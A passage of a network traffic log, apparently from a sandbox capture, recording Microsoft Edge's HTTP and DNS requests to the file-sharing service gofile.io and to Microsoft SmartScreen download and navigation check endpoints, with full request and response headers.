accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:36 GMT
content-type: text/html; charset=utf-8
content-length: 8
access-control-allow-origin: https://gofile.io
access-control-allow-headers: Content-Type, Authorization
access-control-allow-methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
access-control-allow-credentials: true
content-security-policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: cross-origin
origin-agent-cluster: ?1
referrer-policy: no-referrer
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-xss-protection: 0
allow: GET,HEAD
etag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
GET

https://api.gofile.io/contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1

msedge.exe

Remote address:

45.112.123.126:443

Request

GET /contents/Dmq7NE?wt=4fd6sg89d7s6&contentFilter=&page=1&pageSize=1000&sortField=name&sortDirection=1 HTTP/2.0
host: api.gofile.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
authorization: Bearer JkRhayJOGMo94C5Hr0iFEitkBv1kOqRF
accept: */*
origin: https://gofile.io
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx/1.27.1
date: Tue, 17 Dec 2024 18:11:37 GMT
content-type: application/json; charset=utf-8
access-control-allow-origin: https://gofile.io
access-control-allow-headers: Content-Type, Authorization
access-control-allow-methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
access-control-allow-credentials: true
content-security-policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: cross-origin
origin-agent-cluster: ?1
referrer-policy: no-referrer
strict-transport-security: max-age=15552000; includeSubDomains
x-content-type-options: nosniff
x-dns-prefetch-control: off
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-xss-protection: 0
etag: W/"367-KGGxm9XlenZiYs15qJjTVrEfcq8"
content-encoding: gzip
DNS

nav.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nav.smartscreen.microsoft.com

IN A

Response

nav.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-nav.trafficmanager.net

prod-atm-wds-nav.trafficmanager.net

IN CNAME

prod-agic-uw-1.ukwest.cloudapp.azure.com

prod-agic-uw-1.ukwest.cloudapp.azure.com

IN A

51.140.242.104
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiNjQ2bTBZTWYrOWs9Iiwia2V5IjoiOHZsNWluVzlhTWQ3NHYxbkw3M1l2UT09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1272
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 705
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/download/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiWFFGSFREdFR0L0k9Iiwia2V5IjoiWVFGTG1oeGpoUnlaTSszVGdHZmNWdz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1810
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1006
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiZ0pxQy9SamtsUVU9Iiwia2V5IjoiQnpxWENVSVFNRFM5ekNBd0wzSzR0QT09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1756
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:12:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 967
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiNk02M1VoSWM4OG89Iiwia2V5Ijoib1ZTaGUwNUhUNzNTdFNoUHB4d2tEdz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1659
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1524
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiM2EvMzJYTTVwUzQ9Iiwia2V5IjoiMDFkVzBRbkFCZWdhTGh0TnFtWFlyZz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1806
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1007
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

msedge.exe

Remote address:

51.140.242.104:443

Request

POST /api/browser/edge/downloadcomplete/1 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiSzFZbEZydGZkMVU9Iiwia2V5IjoiTDBRRFhTeEtkUURrandzV1I3ckovZz09In0=
User-Agent: SmartScreen/281479409565696
Content-Length: 1438
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 570
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://s.gofile.io/api/event

msedge.exe

Remote address:

51.75.242.210:443

Request

POST /api/event HTTP/2.0
host: s.gofile.io
content-length: 74
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain
accept: */*
origin: https://gofile.io
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://gofile.io/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 202

access-control-allow-credentials: true
access-control-allow-origin: *
access-control-expose-headers:
cache-control: max-age=0, private, must-revalidate
content-type: text/plain; charset=utf-8
date: Tue, 17 Dec 2024 18:11:36 GMT
server: Cowboy
x-request-id: GBIJW92YQFrODcQhKmPD
content-length: 2
DNS

data-edge.smartscreen.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

data-edge.smartscreen.microsoft.com

IN A

Response

data-edge.smartscreen.microsoft.com

IN CNAME

prod-atm-wds-edge.trafficmanager.net

prod-atm-wds-edge.trafficmanager.net

IN CNAME

prod-agic-uw-2.ukwest.cloudapp.azure.com

prod-agic-uw-2.ukwest.cloudapp.azure.com

IN A

51.140.244.186
GET

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

msedge.exe

Remote address:

51.140.244.186:443

Request

GET /windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "170540185939602997400506234197983529371"
User-Agent: SmartScreen/281479409565696
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Type: application/octet-stream
Content-Length: 460992
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=86400
ETag: "638004170464094982"
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
X-OI-Signature: v=1; a=sha384RSA; ha=SHA384; bh=7csvs6wrK3NA5rU73eamx5vAWfaIbGGGGrCaQymgYIKtYElVZVn8FMwEOPvCPHsR; b=iLJvug2xVRHV/zRkTuEyY8Zm5DV1r2rcoFmtOqM4Th8e1UGMuxxCMsEl3V0m2DZ1ibIhJJXHkKq6VicNjkeGtE2XNLuXUg4Nt1+9AjYEtAzZZmF4g52u81VFXkPXAYwDAkuaWGEU1H35w7fv6AlvtPAdSa2GidI4us0RI8m8w0emxetz7h12azENRS2EkL1SmLqM1QA6gpadyCfwnzLR9jRyPC4iCtc4/Pk8DdunPJ80tS/A9XRjUXiBanugKBbt7rxXgPMKd/53Lx1dNJWhhRZdrIb1nui9Uz0C6J98qUNgxElxK1ih7UYNKU4qSWoO4vL6jWtpd+QWlKRX3g2gvQ==; fp=37DBD367E84BB5891D0C8F421BAE3393C75DF49C; h=CACHE-CONTROL:ETAG;
X-OI-Cert: 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
POST

https://data-edge.smartscreen.microsoft.com/api/browser/edge/data/settings

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/data/settings HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoidEJsaTlaUy9ybXM9Iiwia2V5IjoidE40V3I2dEpLSnJ4MVFkOWxmcFA5dz09In0=
If-None-Match: "2.0-0"
User-Agent: SmartScreen/281479409565696
Content-Length: 1321
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Type: application/octet-stream
Content-Length: 129085
Connection: keep-alive
Server: Kestrel
ETag: "2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1"
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release

msedge.exe

Remote address:

51.140.244.186:443

Request

GET /windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19044.4529.vb_release HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "638004170464094982"
User-Agent: SmartScreen/281479409565696
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 304 Not Modified

Date: Tue, 17 Dec 2024 18:11:37 GMT
Content-Length: 0
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=86400
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release

msedge.exe

Remote address:

51.140.244.186:443

Request

GET /windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "636976985063396749.rel.v2"
User-Agent: SmartScreen/281479409565696
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Type: application/octet-stream
Content-Length: 57
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=86400
ETag: "638343870221005468"
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
X-OI-Signature: v=1; a=sha384RSA; ha=SHA384; bh=j4KrExT8d8Sta+9XdhCezD7hBBI07nd+3ZBLADaghRr4d/09v4f5U/qTjaOMrTCA; b=lsxejbsmixGwcuFeAOZKmpd1SHTEllQasQG2+/CD0NsAyZxEvj92iSXg4oIFBkMR6T5zGsr6fweTH5vZVeI6ucDD38nLM9KMrq5eRa9TryJWqO+IbvAljMHNXvAljPK2LeRsDTWYDgopZyWBvWkXXjA1SYiG1lcZjqGoeYE3RGB1av+gzIm0UtuS6l4lOPKBfqrbhng5p43VJZlfWnRtpUA6WIQlA77TnCYXYS+4qby6/glkxz/n6Kqj2AdZiBom/dT2adpHR7dqyW17hHIDaB6CYkxr/l3tputKOQWMABAZujw6r0VSf1RPj+lK+udHaMb0ncnK76ykfpMb9T1YBA==; fp=37DBD367E84BB5891D0C8F421BAE3393C75DF49C; h=CACHE-CONTROL:ETAG;
X-OI-Cert: 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
GET

https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release

msedge.exe

Remote address:

51.140.244.186:443

Request

GET /windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19044.4529.vb_release HTTP/1.1
Connection: Keep-Alive
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenPlain eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQifQ==
If-None-Match: "638343870221005468"
User-Agent: SmartScreen/281479409565696
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 304 Not Modified

Date: Tue, 17 Dec 2024 18:11:36 GMT
Content-Length: 0
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=86400
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://data-edge.smartscreen.microsoft.com/api/browser/edge/data/settings

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/data/settings HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
Accept: application/x-patch-bsdiff, application/octet-stream
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiNjQ2bTBZTWYrOWs9Iiwia2V5IjoiOHZsNWluVzlhTWQ3NHYxbkw3M1l2UT09In0=
If-None-Match: "2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1"
User-Agent: SmartScreen/281479409565696
Content-Length: 1272
Host: data-edge.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Tue, 17 Dec 2024 18:11:37 GMT
Content-Type: application/octet-stream
Content-Length: 129085
Connection: keep-alive
Server: Kestrel
ETag: "2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1"
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

210.242.75.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

210.242.75.51.in-addr.arpa

IN PTR

Response

210.242.75.51.in-addr.arpa

IN PTR

mailgofileio
DNS

104.242.140.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.242.140.51.in-addr.arpa

IN PTR

Response
DNS

